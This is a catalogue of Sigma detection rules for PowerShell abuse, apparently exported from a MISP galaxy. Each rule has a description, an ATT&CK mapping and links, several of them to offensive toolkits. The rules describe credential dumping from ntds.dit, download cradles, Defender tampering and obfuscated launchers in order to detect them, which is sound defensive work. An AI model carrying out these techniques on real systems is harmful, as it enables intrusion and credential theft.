The tag is: misp-galaxy:sigma-rules="Suspicious XOR Encoded PowerShell Command Line - PowerShell"

Suspicious XOR Encoded PowerShell Command Line - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9610. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml

Tamper Windows Defender - PSClassic

Attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.

The tag is: misp-galaxy:sigma-rules="Tamper Windows Defender - PSClassic"

Tamper Windows Defender - PSClassic has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9611. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_windows_defender_set_mp.yml

Zip A Folder With PowerShell For Staging In Temp - PowerShell

Detects PowerShell scripts that make use of the "Compress-Archive" Cmdlet in order to compress folders and files where the output is stored in a potentially suspicious location that is used often by malware for exfiltration. An adversary might compress data (e.g., sensitive documents) that is collected prior to exfiltration in order to make it portable and minimize the amount of data sent over the network.

The tag is: misp-galaxy:sigma-rules="Zip A Folder With PowerShell For Staging In Temp - PowerShell"

Zip A Folder With PowerShell For Staging In Temp - PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

Table 9612. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-347a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml

Suspicious PowerShell Download

Detects suspicious PowerShell download command

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Download"

Suspicious PowerShell Download has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9613. Table References

Links

https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml

Renamed Powershell Under Powershell Channel

Detects renamed powershell

The tag is: misp-galaxy:sigma-rules="Renamed Powershell Under Powershell Channel"

Renamed Powershell Under Powershell Channel has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9614. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml

Potential RemoteFXvGPUDisablement.EXE Abuse

Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.

The tag is: misp-galaxy:sigma-rules="Potential RemoteFXvGPUDisablement.EXE Abuse"

Potential RemoteFXvGPUDisablement.EXE Abuse has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9615. Table References

Links

https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remotefxvgpudisablement_abuse.yml

Nslookup PowerShell Download Cradle

Detects a powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records.

The tag is: misp-galaxy:sigma-rules="Nslookup PowerShell Download Cradle"

Nslookup PowerShell Download Cradle has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9616. Table References

Links

https://twitter.com/Alh4zr3d/status/1566489367232651264

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_abuse_nslookup_with_dns_records.yml

Alternate PowerShell Hosts - PowerShell Module

Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe

The tag is: misp-galaxy:sigma-rules="Alternate PowerShell Hosts - PowerShell Module"

Alternate PowerShell Hosts - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9617. Table References

Links

https://threathunterplaybook.com/hunts/windows/190610-PwshAlternateHosts/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_alternate_powershell_hosts.yml

Invoke-Obfuscation STDIN+ Launcher - PowerShell Module

Detects Obfuscated use of stdin to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation STDIN+ Launcher - PowerShell Module"

Invoke-Obfuscation STDIN+ Launcher - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9618. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_stdin.yml

Bad Opsec Powershell Code Artifacts

focuses on trivial artifacts observed in variants of prevalent offensive ps1 payloads, including Cobalt Strike Beacon, PoshC2, Powerview, Letmein, Empire, Powersploit, and other attack payloads that often undergo minimal changes by attackers due to bad opsec.

The tag is: misp-galaxy:sigma-rules="Bad Opsec Powershell Code Artifacts"

Bad Opsec Powershell Code Artifacts has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9619. Table References

Links

https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/

https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/

https://www.mdeditor.tw/pl/pgRt

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml

Potential Active Directory Enumeration Using AD Module - PsModule

Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration.

The tag is: misp-galaxy:sigma-rules="Potential Active Directory Enumeration Using AD Module - PsModule"

Table 9620. Table References

Links

https://twitter.com/cyb3rops/status/1617108657166061568?s=20

https://github.com/samratashok/ADModule

https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_active_directory_module_dll_import.yml

PowerShell Get Clipboard

A General detection for the Get-Clipboard commands in PowerShell logs. This could be an adversary capturing clipboard contents.

The tag is: misp-galaxy:sigma-rules="PowerShell Get Clipboard"

PowerShell Get Clipboard has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"

Table 9621. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.md

https://github.com/OTRF/detection-hackathon-apt29/issues/16

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml

PowerShell Decompress Commands

A General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.

The tag is: misp-galaxy:sigma-rules="PowerShell Decompress Commands"

PowerShell Decompress Commands has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"

Table 9622. Table References

Links

https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/4.A.3_09F29912-8E93-461E-9E89-3F06F6763383.md

https://github.com/OTRF/detection-hackathon-apt29/issues/8

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_decompress_commands.yml

AD Groups Or Users Enumeration Using PowerShell - PoshModule

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

The tag is: misp-galaxy:sigma-rules="AD Groups Or Users Enumeration Using PowerShell - PoshModule"

AD Groups Or Users Enumeration Using PowerShell - PoshModule has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 9623. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_ad_group_reco.yml

Invoke-Obfuscation Via Use Clip - PowerShell Module

Detects Obfuscated Powershell via use Clip.exe in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Clip - PowerShell Module"

Invoke-Obfuscation Via Use Clip - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9624. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_clip.yml

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module

Detects Obfuscated Powershell via VAR++ LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module"

Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9625. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_var.yml

Suspicious Get Local Groups Information

Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.

The tag is: misp-galaxy:sigma-rules="Suspicious Get Local Groups Information"

Suspicious Get Local Groups Information has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 9626. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_local_group_reco.yml

Suspicious Get-ADDBAccount Usage

Detects suspicious invocation of the Get-ADDBAccount script that reads from a ntds.dit file and may be used to get access to credentials without using any credential dumpers

The tag is: misp-galaxy:sigma-rules="Suspicious Get-ADDBAccount Usage"

Suspicious Get-ADDBAccount Usage has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

Table 9627. Table References

Links

https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/

https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml

Clear PowerShell History - PowerShell Module

Detects keywords that could indicate clearing PowerShell history

The tag is: misp-galaxy:sigma-rules="Clear PowerShell History - PowerShell Module"

Clear PowerShell History - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Clear Command History - T1070.003" with estimative-language:likelihood-probability="almost-certain"

Table 9628. Table References

Links

https://gist.github.com/hook-s3c/7363a856c3cdbadeb71085147f042c1a

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_clear_powershell_history.yml

Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module

Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module"

Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9629. Table References

Links

https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_obfuscated_iex.yml

Malicious PowerShell Commandlets - PoshModule

Detects Commandlet names from well-known PowerShell exploitation frameworks

The tag is: misp-galaxy:sigma-rules="Malicious PowerShell Commandlets - PoshModule"

Malicious PowerShell Commandlets - PoshModule has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Trust Discovery - T1482" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Account Discovery - T1087" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Permission Groups Discovery - T1069" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9630. Table References

Links

https://github.com/adrecon/AzureADRecon

https://github.com/besimorhino/powercat

https://bloodhound.readthedocs.io/en/latest/data-collection/azurehound.html

https://github.com/DarkCoderSc/PowerRunAsSystem/

https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1

https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries

https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1

https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://github.com/BloodHoundAD/BloodHound/blob/0927441f67161cc6dc08a53c63ceb8e333f55874/Collectors/AzureHound.ps1

https://github.com/calebstewart/CVE-2021-1675

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1

https://github.com/samratashok/nishang

https://github.com/Kevin-Robertson/Powermad

https://github.com/HarmJ0y/DAMP

https://github.com/adrecon/ADRecon

https://adsecurity.org/?p=2921

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_malicious_commandlets.yml

Remote PowerShell Session (PS Module)

Detects remote PowerShell sessions

The tag is: misp-galaxy:sigma-rules="Remote PowerShell Session (PS Module)"

Remote PowerShell Session (PS Module) has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Remote Management - T1021.006" with estimative-language:likelihood-probability="almost-certain"

Table 9631. Table References

Links

https://threathunterplaybook.com/hunts/windows/190511-RemotePwshExecution/notebook.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remote_powershell_session.yml

Suspicious Get Information for SMB Share - PowerShell Module

Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.

The tag is: misp-galaxy:sigma-rules="Suspicious Get Information for SMB Share - PowerShell Module"

Suspicious Get Information for SMB Share - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Local Groups - T1069.001" with estimative-language:likelihood-probability="almost-certain"

Table 9632. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.002/T1069.002.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_smb_share_reco.yml

Invoke-Obfuscation Via Use MSHTA - PowerShell Module

Detects Obfuscated Powershell via use MSHTA in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use MSHTA - PowerShell Module"

Invoke-Obfuscation Via Use MSHTA - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9633. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_use_mhsta.yml

Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module

Detects Obfuscated Powershell via COMPRESS OBFUSCATION

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module"

Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9634. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_compress.yml

Suspicious PowerShell Download - PoshModule

Detects suspicious PowerShell download command

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Download - PoshModule"

Suspicious PowerShell Download - PoshModule has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9635. Table References

Links

https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadfile?view=net-8.0

https://learn.microsoft.com/en-us/dotnet/api/system.net.webclient.downloadstring?view=net-8.0

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_download.yml

Invoke-Obfuscation Via Stdin - PowerShell Module

Detects Obfuscated Powershell via Stdin in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Stdin - PowerShell Module"

Invoke-Obfuscation Via Stdin - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9636. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_stdin.yml

Invoke-Obfuscation CLIP+ Launcher - PowerShell Module

Detects Obfuscated use of Clip.exe to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation CLIP+ Launcher - PowerShell Module"

Invoke-Obfuscation CLIP+ Launcher - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9637. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_clip.yml

Malicious PowerShell Scripts - PoshModule

Detects the execution of known offensive powershell scripts used for exploitation or reconnaissance

The tag is: misp-galaxy:sigma-rules="Malicious PowerShell Scripts - PoshModule"

Malicious PowerShell Scripts - PoshModule has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9638. Table References

Links

https://github.com/nettitude/Invoke-PowerThIEf

https://github.com/PowerShellMafia/PowerSploit

https://github.com/besimorhino/powercat

https://github.com/AlsidOfficial/WSUSpendu/

https://github.com/S3cur3Th1sSh1t/WinPwn

https://github.com/DarkCoderSc/PowerRunAsSystem/

https://github.com/S3cur3Th1sSh1t/PowerSharpPack/tree/master/PowerSharpBinaries

https://github.com/xorrior/RandomPS-Scripts/blob/848c919bfce4e2d67b626cbcf4404341cfe3d3b6/Get-DXWebcamVideo.ps1

https://github.com/NetSPI/PowerUpSQL

https://github.com/BC-SECURITY/Invoke-ZeroLogon/blob/111d17c7fec486d9bb23387e2e828b09a26075e4/Invoke-ZeroLogon.ps1

https://github.com/dafthack/DomainPasswordSpray/blob/b13d64a5834694aa73fd2aea9911a83027c465a7/DomainPasswordSpray.ps1

https://unit42.paloaltonetworks.com/threat-assessment-black-basta-ransomware/

https://github.com/samratashok/nishang

https://research.nccgroup.com/2022/06/06/shining-the-light-on-black-basta/

https://github.com/rvrsh3ll/Misc-Powershell-Scripts/blob/6f23bb41f9675d7e2d32bacccff75e931ae00554/OfficeMemScraper.ps1

https://github.com/HarmJ0y/DAMP

https://github.com/CsEnox/EventViewer-UACBypass

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_exploit_scripts.yml

Suspicious PowerShell Invocations - Generic - PowerShell Module

Detects suspicious PowerShell invocation command parameters

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Invocations - Generic - PowerShell Module"

Suspicious PowerShell Invocations - Generic - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9639. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_generic.yml

SyncAppvPublishingServer Bypass Powershell Restriction - PS Module

Detects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.

The tag is: misp-galaxy:sigma-rules="SyncAppvPublishingServer Bypass Powershell Restriction - PS Module"

SyncAppvPublishingServer Bypass Powershell Restriction - PS Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9640. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/Syncappvpublishingserver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_syncappvpublishingserver_exe.yml

Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module

Detects Obfuscated Powershell via RUNDLL LAUNCHER

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module"

Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9641. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_via_rundll.yml

Invoke-Obfuscation VAR+ Launcher - PowerShell Module

Detects Obfuscated use of Environment Variables to execute PowerShell

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation VAR+ Launcher - PowerShell Module"

Invoke-Obfuscation VAR+ Launcher - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9642. Table References

Links

https://github.com/SigmaHQ/sigma/issues/1009

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_invoke_obfuscation_var.yml

Suspicious PowerShell Invocations - Specific - PowerShell Module

Detects suspicious PowerShell invocation command parameters

The tag is: misp-galaxy:sigma-rules="Suspicious PowerShell Invocations - Specific - PowerShell Module"

Suspicious PowerShell Invocations - Specific - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

Table 9643. Table References

Links

Internal Research[Internal Research]

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_invocation_specific.yml

Suspicious Computer Machine Password by PowerShell

The Reset-ComputerMachinePassword cmdlet changes the computer account password that the computers use to authenticate to the domain controllers in the domain. You can use it to reset the password of the local computer.

The tag is: misp-galaxy:sigma-rules="Suspicious Computer Machine Password by PowerShell"

Suspicious Computer Machine Password by PowerShell has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

Table 9644. Table References

Links

https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1

https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml

Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module

Detects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.

The tag is: misp-galaxy:sigma-rules="Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module"

Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Binary Proxy Execution - T1218" with estimative-language:likelihood-probability="almost-certain"

Table 9645. Table References

Links

https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_remotefxvgpudisablement_abuse.yml

Use Get-NetTCPConnection - PowerShell Module

Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.

The tag is: misp-galaxy:sigma-rules="Use Get-NetTCPConnection - PowerShell Module"

Use Get-NetTCPConnection - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 9646. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_get_nettcpconnection.yml

Invoke-Obfuscation Via Use Rundll32 - PowerShell Module

Detects Obfuscated Powershell via use Rundll32 in Scripts

The tag is: misp-galaxy:sigma-rules="Invoke-Obfuscation Via Use Rundll32 - PowerShell Module"

Invoke-Obfuscation Via Use Rundll32 - PowerShell Module has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

